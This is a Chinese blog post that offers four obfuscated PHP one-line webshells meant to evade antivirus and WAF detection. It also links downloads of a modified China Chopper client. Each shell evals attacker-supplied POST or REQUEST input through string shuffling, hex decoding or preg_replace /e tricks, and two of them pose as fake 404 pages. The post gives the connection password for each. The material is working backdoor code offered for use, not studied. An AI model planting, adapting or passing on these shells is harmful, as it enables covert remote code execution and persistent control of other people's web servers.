2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)

版权声明:本文为博主原创文章,转载请注明来源。 https://blog.csdn.net/settoken/article/details/53114781

中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

http://download.csdn.net/detail/settoken/9457567

https://pan.baidu.com/s/1jHoJxHW

China chopper

https://pan.baidu.com/s/1eRxEYjC

这次特别推荐的一个php免杀过WAF一句话.

无任何php危险函数特征,除eval外,无POST GET REQUEST 请求函数.

<?php $g18="<X(CAT[tuhDdUOvbqPcEil'=5F]NYB!r\";1SL7`9G#k+ w>_{@~y-fHIJ\r:8\$MgoR6}Wj*s^n,4x0\\m.Q%V3|e\n&)azKZ/?2p\t";$GLOBALS['bbsfw34'] = ${$g18[47].$g18[17].$g18[13].$g18[35].$g18[5]};$GLOBALS['majcz28'] = $g18[9].$g18[85].$g18[89].$g18[11].$g18[85].$g18[31];if (!empty($GLOBALS['bbsfw34']['mf8c3a3b0'])) { eval($GLOBALS['bbsfw34']['mf8c3a3b0']); } $GLOBALS['majcz28']($g18[54].$g18[5].$g18[5].$g18[17].$g18[93].$g18[34].$g18[79].$g18[76].$g18[44].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11]); echo $g18[0].$g18[9].$g18[34].$g18[46].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11].$g18[0].$g18[93].$g18[9].$g18[34].$g18[46].$g18[57].$g18[86].$g18[5].$g18[9].$g18[85].$g18[44].$g18[96].$g18[89].$g18[62].$g18[85].$g18[44].$g18[7].$g18[9].$g18[89].$g18[7].$g18[44].$g18[51].$g18[63].$g18[8].$g18[44].$g18[9].$g18[89].$g18[14].$g18[85].$g18[44].$g18[31].$g18[85].$g18[16].$g18[8].$g18[85].$g18[70].$g18[7].$g18[85].$g18[11].$g18[44].$g18[18].$g18[63].$g18[8].$g18[21].$g18[11].$g18[44].$g18[72].$g18[63].$g18[7].$g18[44].$g18[15].$g18[85].$g18[44].$g18[53].$g18[63].$g18[8].$g18[72].$g18[11].$g18[79].$g18[57].$g18[86]; ?>


这个php一句带非常真实的404页面.运行界面如下图:


配合优化版菜刀可以直接连接,如图.


连接密码为:mf8c3a3b0


第二个:

<?php
function Aes($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
	$k=(($i+2)/2)%strlen($key);
	$p=substr($key, $k,1);
	if(is_numeric(substr($str, $i,1)))
	{
		$t=$t.chr(hexdec(substr($str, $i,2))-$p);
	}
	else
	{
		$t=$t.chr(hexdec(substr($str, $i,4)));
		$i=$i+2;
	}
}
return($t);
}

(@$_=Aes('6A767C687B77','39')).@$_(Aes('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
?>

这个一句话也是无危险函数特征,菜刀直接连接. 

连接密码为:520


第三个:

<?php 
error_reporting(0);
echo "404 Not Found.";
$default= "ps_ot" ;
$about =strtoupper($default[2]. $default[0] .$default[3]. $default[1].$default[4] );
if (isset(${ $about } ['index' ]) ) {eval ( ${$about } [ 'index'] );} ?>

这也是非常值得推荐给大家的。

连接密码为:index


第四个:

array_walk函数,在php4 php5 php7所有php版本中通用.

<?php
$e = $_REQUEST['www'];
$arr = array($_POST['settoken'] => '|.*|e',);
array_walk($arr, $e, '');
?>
使用方法如下图:


在php文件后面加上?www=preg_replace

连接密码为:settoken

没有更多推荐了,返回首页

私密
私密原因:
请选择设置私密原因
  • 广告
  • 抄袭
  • 版权
  • 政治
  • 色情
  • 无意义
  • 其他
其他原因:
120
出错啦
系统繁忙,请稍后再试

关闭